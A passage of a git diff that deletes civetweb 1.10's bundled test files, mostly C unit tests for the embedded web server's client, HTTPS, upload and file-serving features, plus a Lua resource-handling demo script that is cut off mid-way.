-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8443s";
-	OPTIONS[opt_cnt++] = "ssl_certificate";
-	OPTIONS[opt_cnt++] = ssl_cert;
-#ifdef __MACH__
-	/* The Apple builds on Travis CI seem to have problems with TLS1.x
-	 * Allow SSLv3 and TLS */
-	OPTIONS[opt_cnt++] = "ssl_protocol_version";
-	OPTIONS[opt_cnt++] = "2";
-#else
-	/* The Linux builds on Travis CI work fine with TLS1.2 */
-	OPTIONS[opt_cnt++] = "ssl_protocol_version";
-	OPTIONS[opt_cnt++] = "4";
-#endif
-	ck_assert(ssl_cert != NULL);
-#endif
-	OPTIONS[opt_cnt] = NULL;
-
-
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.begin_request = test_large_file_begin_request;
-	callbacks.log_message = log_msg_func;
-
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-	/* Try downloading several times */
-	retry_ok_cnt = 0;
-	retry_fail_cnt = 0;
-	for (retry = 0; retry < 3; retry++) {
-		int fail = 0;
-		/* connect client */
-		memset(client_err_buf, 0, sizeof(client_err_buf));
-		memset(client_data_buf, 0, sizeof(client_data_buf));
-
-		client =
-		    mg_download("127.0.0.1",
-#if defined(NO_SSL)
-		                8080,
-		                0,
-#else
-		                8443,
-		                1,
-#endif
-		                client_err_buf,
-		                sizeof(client_err_buf),
-		                "GET /large.file HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n");
-
-		ck_assert(client != NULL);
-		ck_assert_str_eq(client_err_buf, "");
-
-		client_ri = mg_get_request_info(client);
-
-		ck_assert(client_ri != NULL);
-		ck_assert_str_eq(client_ri->local_uri, "200");
-
-		ck_assert_int_eq(client_ri->content_length, LARGE_FILE_SIZE);
-
-		data_read = 0;
-		while (data_read < client_ri->content_length) {
-			r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-			if (r < 0) {
-				fail = 1;
-				break;
-			};
-			data_read += r;
-		}
-
-		/* Nothing left to read */
-		r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-		if (fail) {
-			ck_assert_int_eq(r, -1);
-			retry_fail_cnt++;
-		} else {
-			ck_assert_int_eq(r, 0);
-			retry_ok_cnt++;
-		}
-
-		/* Close the client connection */
-		mg_close_connection(client);
-	}
-
-#if defined(_WIN32)
-// TODO: Check this problem on AppVeyor
-// ck_assert_int_le(retry_fail_cnt, 2);
-// ck_assert_int_ge(retry_ok_cnt, 1);
-#else
-	ck_assert_int_eq(retry_fail_cnt, 0);
-	ck_assert_int_eq(retry_ok_cnt, 3);
-#endif
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	mark_point();
-}
-END_TEST
-
-
-static int test_mg_store_body_con_len = 20000;
-
-
-static int
-test_mg_store_body_put_delete_handler(struct mg_connection *conn, void *ignored)
-{
-	char path[4096] = {0};
-	const struct mg_request_info *info = mg_get_request_info(conn);
-	int64_t rc;
-
-	(void)ignored;
-
-	mark_point();
-
-	sprintf(path, "./%s", info->local_uri);
-	rc = mg_store_body(conn, path);
-
-	ck_assert_int_eq(test_mg_store_body_con_len, rc);
-
-	if (rc < 0) {
-		mg_printf(conn,
-		          "HTTP/1.1 500 Internal Server Error\r\n"
-		          "Content-Type:text/plain;charset=UTF-8\r\n"
-		          "Connection:close\r\n\r\n"
-		          "%s (ret: %ld)\n",
-		          path,
-		          (long)rc);
-		mg_close_connection(conn);
-
-		/* Debug output for tests */
-		printf("mg_store_body(%s) failed (ret: %ld)\n", path, (long)rc);
-
-		return 500;
-	}
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Type:text/plain;charset=UTF-8\r\n"
-	          "Connection:close\r\n\r\n"
-	          "%s OK (%ld bytes saved)\n",
-	          path,
-	          (long)rc);
-	mg_close_connection(conn);
-
-	/* Debug output for tests */
-	printf("mg_store_body(%s) OK (%ld bytes)\n", path, (long)rc);
-
-	mark_point();
-
-	return 200;
-}
-
-
-static int
-test_mg_store_body_begin_request_callback(struct mg_connection *conn)
-{
-	const struct mg_request_info *info = mg_get_request_info(conn);
-
-	mark_point();
-
-	/* Debug output for tests */
-	printf("test_mg_store_body_begin_request_callback called (%s)\n",
-	       info->request_method);
-
-	if ((strcmp(info->request_method, "PUT") == 0)
-	    || (strcmp(info->request_method, "DELETE") == 0)) {
-		return test_mg_store_body_put_delete_handler(conn, NULL);
-	}
-
-	mark_point();
-
-	return 0;
-}
-
-
-START_TEST(test_mg_store_body)
-{
-	/* Client data */
-	char client_err_buf[256];
-	char client_data_buf[1024];
-	struct mg_connection *client;
-	const struct mg_request_info *client_ri;
-	int r;
-	char check_data[256];
-	char *check_ptr;
-	char errmsg[256] = {0};
-
-	/* Server context handle */
-	struct mg_context *ctx;
-	struct mg_callbacks callbacks;
-	const char *options[] = {
-#if !defined(NO_FILES)
-		"document_root",
-		".",
-#endif
-#if !defined(NO_CACHING)
-		"static_file_max_age",
-		"0",
-#endif
-		"listening_ports",
-		"127.0.0.1:8082",
-		"num_threads",
-		"1",
-		NULL
-	};
-
-	mark_point();
-
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.begin_request = test_mg_store_body_begin_request_callback;
-	callbacks.log_message = log_msg_func;
-
-	/* Initialize the library */
-	mg_init_library(0);
-
-	/* Start the server */
-	ctx = mg_start(&callbacks, (void *)errmsg, options);
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-	/* Run the server for 15 seconds */
-	test_sleep(15);
-
-	/* Call a test client */
-	client = mg_connect_client(
-	    "127.0.0.1", 8082, 0, client_err_buf, sizeof(client_err_buf));
-
-	ck_assert_str_eq(client_err_buf, "");
-	ck_assert(client != NULL);
-
-	mg_printf(client,
-	          "PUT /%s HTTP/1.0\r\nContent-Length: %i\r\n\r\n",
-	          "test_file_name.txt",
-	          test_mg_store_body_con_len);
-
-	r = 0;
-	while (r < test_mg_store_body_con_len) {
-		int l = mg_write(client, "1234567890", 10);
-		ck_assert_int_eq(l, 10);
-		r += 10;
-	}
-
-	r = mg_get_response(client, client_err_buf, sizeof(client_err_buf), 10000);
-	ck_assert_int_ge(r, 0);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-	ck_assert(client_ri != NULL);
-
-	/* Response must be 200 OK  */
-	ck_assert_ptr_ne(client_ri->request_uri, NULL);
-	ck_assert_str_eq(client_ri->request_uri, "200");
-
-	/* Read PUT response */
-	r = mg_read(client, client_data_buf, sizeof(client_data_buf) - 1);
-	ck_assert_int_gt(r, 0);
-	client_data_buf[r] = 0;
-
-	sprintf(check_data, "(%i bytes saved)", test_mg_store_body_con_len);
-	check_ptr = strstr(client_data_buf, check_data);
-	ck_assert_ptr_ne(check_ptr, NULL);
-
-	mg_close_connection(client);
-
-	/* Run the server for 5 seconds */
-	test_sleep(5);
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	/* Un-initialize the library */
-	mg_exit_library();
-
-	mark_point();
-}
-END_TEST
-
-
-#if defined(MG_USE_OPEN_FILE) && !defined(NO_FILES)
-
-#define FILE_IN_MEM_SIZE (1024 * 100)
-static char *file_in_mem_data;
-
-static const char *
-test_file_in_memory_open_file(const struct mg_connection *conn,
-                              const char *file_path,
-                              size_t *file_size)
-{
-	(void)conn;
-
-	if (strcmp(file_path, "./file_in_mem") == 0) {
-		/* File is in memory */
-		*file_size = FILE_IN_MEM_SIZE;
-		return file_in_mem_data;
-	} else {
-		/* File is not in memory */
-		return NULL;
-	}
-}
-
-
-START_TEST(test_file_in_memory)
-{
-	/* Server var */
-	struct mg_context *ctx;
-	struct mg_callbacks callbacks;
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-#if !defined(NO_SSL)
-	const char *ssl_cert = locate_ssl_cert();
-#endif
-
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-	int64_t data_read;
-	int r, i;
-
-	/* Prepare test data */
-	file_in_mem_data = (char *)malloc(FILE_IN_MEM_SIZE);
-	ck_assert_ptr_ne(file_in_mem_data, NULL);
-	for (r = 0; r < FILE_IN_MEM_SIZE; r++) {
-		file_in_mem_data[r] = (char)(r);
-	}
-
-	/* Set options and start server */
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#if defined(NO_SSL)
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-#else
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8443s";
-	OPTIONS[opt_cnt++] = "ssl_certificate";
-	OPTIONS[opt_cnt++] = ssl_cert;
-	ck_assert(ssl_cert != NULL);
-#endif
-	OPTIONS[opt_cnt] = NULL;
-
-
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.open_file = test_file_in_memory_open_file;
-
-	ctx = test_mg_start(&callbacks, 0, OPTIONS);
-	ck_assert(ctx != NULL);
-
-	/* connect client */
-	memset(client_err_buf, 0, sizeof(client_err_buf));
-	memset(client_data_buf, 0, sizeof(client_data_buf));
-
-	client =
-	    mg_download("127.0.0.1",
-#if defined(NO_SSL)
-	                8080,
-	                0,
-#else
-	                8443,
-	                1,
-#endif
-	                client_err_buf,
-	                sizeof(client_err_buf),
-	                "GET /file_in_mem HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n");
-
-	ck_assert(client != NULL);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-
-	ck_assert(client_ri != NULL);
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	ck_assert_int_eq(client_ri->content_length, FILE_IN_MEM_SIZE);
-
-	data_read = 0;
-	while (data_read < client_ri->content_length) {
-		r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-		if (r > 0) {
-			for (i = 0; i < r; i++) {
-				ck_assert_int_eq((int)client_data_buf[i],
-				                 (int)file_in_mem_data[data_read + i]);
-			}
-			data_read += r;
-		}
-	}
-
-	/* Nothing left to read */
-	r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-	ck_assert_int_eq(r, 0);
-
-	/* Close the client connection */
-	mg_close_connection(client);
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	/* Free test data */
-	free(file_in_mem_data);
-	file_in_mem_data = NULL;
-}
-END_TEST
-
-#else /* defined(MG_USE_OPEN_FILE) */
-
-START_TEST(test_file_in_memory)
-{
-	mark_point();
-}
-END_TEST
-
-#endif
-
-
-static void
-minimal_http_https_client_impl(const char *server,
-                               uint16_t port,
-                               int use_ssl,
-                               const char *uri)
-{
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-	int64_t data_read;
-	int r;
-
-	mark_point();
-
-	client = mg_connect_client(
-	    server, port, use_ssl, client_err_buf, sizeof(client_err_buf));
-
-	ck_assert_str_eq(client_err_buf, "");
-	ck_assert(client != NULL);
-
-	mg_printf(client, "GET /%s HTTP/1.0\r\n\r\n", uri);
-
-	r = mg_get_response(client, client_err_buf, sizeof(client_err_buf), 10000);
-	ck_assert_int_ge(r, 0);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-	ck_assert(client_ri != NULL);
-
-	/* e.g.: ck_assert_str_eq(client_ri->request_uri, "200"); */
-	ck_assert_ptr_ne(client_ri->request_uri, NULL);
-	r = (int)strlen(client_ri->request_uri);
-	ck_assert_int_eq(r, 3);
-
-	data_read = 0;
-	while (data_read < client_ri->content_length) {
-		r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-		if (r > 0) {
-			data_read += r;
-		}
-	}
-
-	/* Nothing left to read */
-	r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-	ck_assert_int_eq(r, 0);
-
-	mark_point();
-
-	mg_close_connection(client);
-
-	mark_point();
-}
-
-
-static void
-minimal_http_client_impl(const char *server, uint16_t port, const char *uri)
-{
-	minimal_http_https_client_impl(server, port, 0, uri);
-}
-
-
-#if !defined(NO_SSL)
-static void
-minimal_https_client_impl(const char *server, uint16_t port, const char *uri)
-{
-	minimal_http_https_client_impl(server, port, 1, uri);
-}
-#endif
-
-
-START_TEST(test_minimal_client)
-{
-	mark_point();
-
-	/* Initialize the library */
-	mg_init_library(0);
-
-	mark_point();
-
-	/* Call a test client */
-	minimal_http_client_impl("192.30.253.113" /* www.github.com */,
-	                         80,
-	                         "civetweb/civetweb/");
-
-	mark_point();
-
-	/* Un-initialize the library */
-	mg_exit_library();
-
-	mark_point();
-}
-END_TEST
-
-
-static int
-minimal_test_request_handler(struct mg_connection *conn, void *cbdata)
-{
-	const char *msg = (const char *)cbdata;
-	unsigned long len = (unsigned long)strlen(msg);
-
-	mark_point();
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Length: %lu\r\n"
-	          "Content-Type: text/plain\r\n"
-	          "Connection: close\r\n\r\n",
-	          len);
-
-	mg_write(conn, msg, len);
-
-	mark_point();
-
-	return 200;
-}
-
-
-START_TEST(test_minimal_http_server_callback)
-{
-	/* This test should ensure the minimum server example in
-	 * docs/Embedding.md is still running. */
-
-	/* Server context handle */
-	struct mg_context *ctx;
-
-	mark_point();
-
-	/* Initialize the library */
-	mg_init_library(0);
-
-	/* Start the server */
-	ctx = test_mg_start(NULL, 0, NULL);
-	ck_assert(ctx != NULL);
-
-	/* Add some handler */
-	mg_set_request_handler(ctx,
-	                       "/hello",
-	                       minimal_test_request_handler,
-	                       (void *)"Hello world");
-	mg_set_request_handler(ctx,
-	                       "/8",
-	                       minimal_test_request_handler,
-	                       (void *)"Number eight");
-
-	/* Run the server for 15 seconds */
-	test_sleep(10);
-
-	/* Call a test client */
-	minimal_http_client_impl("127.0.0.1", 8080, "/hello");
-
-	/* Run the server for 15 seconds */
-	test_sleep(5);
-
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	/* Un-initialize the library */
-	mg_exit_library();
-
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_minimal_https_server_callback)
-{
-#if !defined(NO_SSL)
-	/* This test should show a HTTPS server with enhanced
-	 * security settings.
-	 *
-	 * Articles:
-	 * https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
-	 *
-	 * Scanners:
-	 * https://securityheaders.io/
-	 * https://www.htbridge.com/ssl/
-	 * https://www.htbridge.com/websec/
-	 * https://www.ssllabs.com/ssltest/
-	 * https://www.qualys.com/forms/freescan/
-	 */
-
-	/* Server context handle */
-	struct mg_context *ctx;
-
-	/* Server start parameters for HTTPS */
-	const char *OPTIONS[32];
-	int opt_idx = 0;
-
-	/* HTTPS port - required */
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = "8443s";
-
-	/* path to certificate file - required */
-	OPTIONS[opt_idx++] = "ssl_certificate";
-	OPTIONS[opt_idx++] = locate_ssl_cert();
-
-#if defined(LOCAL_TEST) || defined(_WIN32)
-	/* Do not set this on Travis CI, since the build containers
-	 * contain older SSL libraries */
-
-	/* set minimum SSL version to TLS 1.2 - recommended */
-	OPTIONS[opt_idx++] = "ssl_protocol_version";
-	OPTIONS[opt_idx++] = "4";
-
-	/* set some modern ciphers - recommended */
-	OPTIONS[opt_idx++] = "ssl_cipher_list";
-	OPTIONS[opt_idx++] = "ECDH+AESGCM+AES256:!aNULL:!MD5:!DSS";
-#endif
-
-	/* set "HTTPS only" header - recommended */
-	OPTIONS[opt_idx++] = "strict_transport_security_max_age";
-	OPTIONS[opt_idx++] = "31622400";
-
-	/* end of options - required */
-	OPTIONS[opt_idx] = NULL;
-
-	mark_point();
-
-	/* Initialize the library */
-	mg_init_library(0);
-
-
-	/* Start the server */
-	ctx = test_mg_start(NULL, 0, OPTIONS);
-	ck_assert(ctx != NULL);
-
-	/* Add some handler */
-	mg_set_request_handler(ctx,
-	                       "/hello",
-	                       minimal_test_request_handler,
-	                       (void *)"Hello world");
-	mg_set_request_handler(ctx,
-	                       "/8",
-	                       minimal_test_request_handler,
-	                       (void *)"Number eight");
-
-	/* Run the server for 15 seconds */
-	test_sleep(10);
-
-	/* Call a test client */
-	minimal_https_client_impl("127.0.0.1", 8443, "/hello");
-
-	/* Run the server for 15 seconds */
-	test_sleep(5);
-
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	/* Un-initialize the library */
-	mg_exit_library();
-#endif
-	mark_point();
-}
-END_TEST
-
-
-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)
-Suite *
-make_public_server_suite(void)
-{
-	Suite *const suite = suite_create("PublicServer");
-
-	TCase *const tcase_checktestenv = tcase_create("Check test environment");
-	TCase *const tcase_initlib = tcase_create("Init library");
-	TCase *const tcase_startthreads = tcase_create("Start threads");
-	TCase *const tcase_minimal_svr = tcase_create("Minimal Server");
-	TCase *const tcase_minimal_cli = tcase_create("Minimal Client");
-	TCase *const tcase_startstophttp = tcase_create("Start Stop HTTP Server");
-	TCase *const tcase_startstophttp_ipv6 =
-	    tcase_create("Start Stop HTTP Server IPv6");
-	TCase *const tcase_startstophttps = tcase_create("Start Stop HTTPS Server");
-	TCase *const tcase_serverandclienttls = tcase_create("TLS Server Client");
-	TCase *const tcase_serverrequests = tcase_create("Server Requests");
-	TCase *const tcase_storebody = tcase_create("Store Body");
-	TCase *const tcase_handle_form = tcase_create("Handle Form");
-	TCase *const tcase_http_auth = tcase_create("HTTP Authentication");
-	TCase *const tcase_keep_alive = tcase_create("HTTP Keep Alive");
-	TCase *const tcase_error_handling = tcase_create("Error handling");
-	TCase *const tcase_throttle = tcase_create("Limit speed");
-	TCase *const tcase_large_file = tcase_create("Large file");
-	TCase *const tcase_file_in_mem = tcase_create("File in memory");
-
-
-	tcase_add_test(tcase_checktestenv, test_the_test_environment);
-	tcase_set_timeout(tcase_checktestenv, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_checktestenv);
-
-	tcase_add_test(tcase_initlib, test_init_library);
-	tcase_set_timeout(tcase_initlib, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_initlib);
-
-	tcase_add_test(tcase_startthreads, test_threading);
-	tcase_set_timeout(tcase_startthreads, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_startthreads);
-
-	tcase_add_test(tcase_minimal_svr, test_minimal_http_server_callback);
-	tcase_add_test(tcase_minimal_svr, test_minimal_https_server_callback);
-	tcase_set_timeout(tcase_minimal_svr, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_minimal_svr);
-
-	tcase_add_test(tcase_minimal_cli, test_minimal_client);
-	tcase_set_timeout(tcase_minimal_cli, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_minimal_cli);
-
-	tcase_add_test(tcase_startstophttp, test_mg_start_stop_http_server);
-	tcase_set_timeout(tcase_startstophttp, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_startstophttp);
-
-	tcase_add_test(tcase_startstophttp_ipv6,
-	               test_mg_start_stop_http_server_ipv6);
-	tcase_set_timeout(tcase_startstophttp_ipv6,
-	                  civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_startstophttp_ipv6);
-
-	tcase_add_test(tcase_startstophttps, test_mg_start_stop_https_server);
-	tcase_set_timeout(tcase_startstophttps, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_startstophttps);
-
-	tcase_add_test(tcase_serverandclienttls, test_mg_server_and_client_tls);
-	tcase_set_timeout(tcase_serverandclienttls,
-	                  civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_serverandclienttls);
-
-	tcase_add_test(tcase_serverrequests, test_request_handlers);
-	tcase_set_timeout(tcase_serverrequests, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_serverrequests);
-
-	tcase_add_test(tcase_storebody, test_mg_store_body);
-	tcase_set_timeout(tcase_storebody, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_storebody);
-
-	tcase_add_test(tcase_handle_form, test_handle_form);
-	tcase_set_timeout(tcase_handle_form, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_handle_form);
-
-	tcase_add_test(tcase_http_auth, test_http_auth);
-	tcase_set_timeout(tcase_http_auth, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_http_auth);
-
-	tcase_add_test(tcase_keep_alive, test_keep_alive);
-	tcase_set_timeout(tcase_keep_alive, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_keep_alive);
-
-	tcase_add_test(tcase_error_handling, test_error_handling);
-	tcase_add_test(tcase_error_handling, test_error_log_file);
-	tcase_set_timeout(tcase_error_handling, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_error_handling);
-
-	tcase_add_test(tcase_throttle, test_throttle);
-	tcase_set_timeout(tcase_throttle, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_throttle);
-
-	tcase_add_test(tcase_large_file, test_large_file);
-	tcase_set_timeout(tcase_large_file, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_large_file);
-
-	tcase_add_test(tcase_file_in_mem, test_file_in_memory);
-	tcase_set_timeout(tcase_file_in_mem, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_file_in_mem);
-
-	return suite;
-}
-#endif
-
-
-#ifdef REPLACE_CHECK_FOR_LOCAL_DEBUGGING
-/* Used to debug test cases without using the check framework */
-/* Build command for Linux:
-gcc test/public_server.c src/civetweb.c -I include/ -I test/ -l pthread -l dl -D
-LOCAL_TEST -D REPLACE_CHECK_FOR_LOCAL_DEBUGGING -D MAIN_PUBLIC_SERVER=main
-*/
-
-static int chk_ok = 0;
-static int chk_failed = 0;
-
-
-void
-MAIN_PUBLIC_SERVER(void)
-{
-	unsigned f_avail = mg_check_feature(0xFF);
-	unsigned f_ret = mg_init_library(f_avail);
-	ck_assert_uint_eq(f_ret, f_avail);
-
-	test_the_test_environment(0);
-	test_threading(0);
-
-	test_minimal_client(0);
-
-	test_mg_start_stop_http_server(0);
-	test_mg_start_stop_https_server(0);
-	test_request_handlers(0);
-	test_mg_store_body(0);
-	test_mg_server_and_client_tls(0);
-	test_handle_form(0);
-	test_http_auth(0);
-	test_keep_alive(0);
-	test_error_handling(0);
-	test_error_log_file(0);
-	test_throttle(0);
-	test_large_file(0);
-	test_file_in_memory(0);
-
-	mg_exit_library();
-
-	printf("\nok: %i\nfailed: %i\n\n", chk_ok, chk_failed);
-}
-
-void
-_ck_assert_failed(const char *file, int line, const char *expr, ...)
-{
-	va_list va;
-	va_start(va, expr);
-	fprintf(stderr, "Error: %s, line %i\n", file, line); /* breakpoint here ! */
-	vfprintf(stderr, expr, va);
-	fprintf(stderr, "\n\n");
-	va_end(va);
-	chk_failed++;
-}
-
-void
-_ck_assert_msg(int cond, const char *file, int line, const char *expr, ...)
-{
-	va_list va;
-
-	if (cond) {
-		chk_ok++;
-		return;
-	}
-
-	va_start(va, expr);
-	fprintf(stderr, "Error: %s, line %i\n", file, line); /* breakpoint here ! */
-	vfprintf(stderr, expr, va);
-	fprintf(stderr, "\n\n");
-	va_end(va);
-	chk_failed++;
-}
-
-void
-_mark_point(const char *file, int line)
-{
-	chk_ok++;
-}
-
-void
-tcase_fn_start(const char *fname, const char *file, int line)
-{
-}
-void suite_add_tcase(Suite *s, TCase *tc){};
-void _tcase_add_test(TCase *tc,
-                     TFun tf,
-                     const char *fname,
-                     int _signal,
-                     int allowed_exit_value,
-                     int start,
-                     int end){};
-TCase *
-tcase_create(const char *name)
-{
-	return NULL;
-};
-Suite *
-suite_create(const char *name)
-{
-	return NULL;
-};
-void tcase_set_timeout(TCase *tc, double timeout){};
-
-#endif
diff --git a/thirdparty/civetweb-1.10/test/public_server.h b/thirdparty/civetweb-1.10/test/public_server.h
deleted file mode 100644
index c3e0d8e..0000000
--- a/thirdparty/civetweb-1.10/test/public_server.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_PUBLIC_SERVER_H_
-#define TEST_PUBLIC_SERVER_H_
-
-#include "civetweb_check.h"
-
-Suite *make_public_server_suite(void);
-
-#endif /* TEST_PUBLIC_H_ */
diff --git a/thirdparty/civetweb-1.10/test/require_test.lua b/thirdparty/civetweb-1.10/test/require_test.lua
deleted file mode 100644
index 6173dfa..0000000
--- a/thirdparty/civetweb-1.10/test/require_test.lua
+++ /dev/null
@@ -1,2 +0,0 @@
-require 'html_esc'

-require 'HugeText'

diff --git a/thirdparty/civetweb-1.10/test/resource_script_demo.lua b/thirdparty/civetweb-1.10/test/resource_script_demo.lua
deleted file mode 100644
index e21e465..0000000
--- a/thirdparty/civetweb-1.10/test/resource_script_demo.lua
+++ /dev/null
@@ -1,124 +0,0 @@
--- This is a Lua script that handles sub-resources, e.g. resource_script_demo.lua/path/file.ext

-

-scriptUri = "resource_script_demo.lua"

-envVar = "resource_script_demo_storage"

-

-resourcedir = os.getenv(envVar) or "R:\\RESOURCEDIR"

-method = mg.request_info.request_method:upper()

-

-if resourcedir then

-  attr = lfs.attributes(resourcedir)

-end

-

-if (not mg.request_info.uri:find(scriptUri)) or (not resourcedir) or (not attr) or (attr.mode~="directory") then

-    mg.write("HTTP/1.0 500 OK\r\n")

-    mg.write("Connection: close\r\n")

-    mg.write("Content-Type: text/html; charset=utf-8\r\n")

-    mg.write("\r\n")

-    mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-    mg.write("<body>\r\nServer error.<br>\r\n")

-    mg.write("The server admin must make sure this script is available as URI " .. scriptUri .. "<br>\r\n")

-    mg.write("The server admin must set the environment variable " .. envVar .. " to a directory.<br>\r\n")

-    mg.write("</body>\r\n</html>\r\n")

-    return

-end

-subresource = mg.request_info.uri:match(scriptUri .. "/(.*)")

-

-if not subresource then

-    if method=="GET" then

-        mg.write("HTTP/1.0 200 OK\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>No resource specified.<br>resourcedir is " .. resourcedir .. "</body></html>\r\n")

-    else

-        mg.write("HTTP/1.0 405 Method Not Allowed\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Method not allowed.</body></html>\r\n")

-    end

-    return

-end

-

-

-if method=="GET" then

-    file = resourcedir .. "/" .. subresource

-    if lfs.attributes(file) then

-        mg.send_file(file)

-    else

-        mime = mg.get_mime_type(file)

-        mg.write("HTTP/1.0 404 Not Found\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Resource of type \"" .. mime .. "\" not found.</body></html>\r\n")

-    end

-    return

-end

-

-if method=="PUT" then

-    file = resourcedir .. "/" .. subresource

-    mime = mg.get_mime_type(file)

-    if lfs.attributes(file) then

-        mg.write("HTTP/1.0 405 Method Not Allowed\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Resource of type \"" .. mime .. "\" already exists.</body></html>\r\n")

-    else

-        local f = io.open(file, "w")

-

-        local data = {}

-        repeat

-            local l = mg.read();

-            data[#data+1] = l;

-        until ((l == "") or (l == nil));

-

-        f:write(table.concat(data, ""))

-        f:close()

-        mg.write("HTTP/1.0 200 OK\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Resource of type \"" .. mime .. "\" created.</body></html>\r\n")

-    end

-    return

-end

-

-if method=="DELETE" then

-    file = resourcedir .. "/" .. subresource

-    mime = mg.get_mime_type(file)

-    if lfs.attributes(file) then

-        os.remove(file)

-        mg.write("HTTP/1.0 200 OK\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

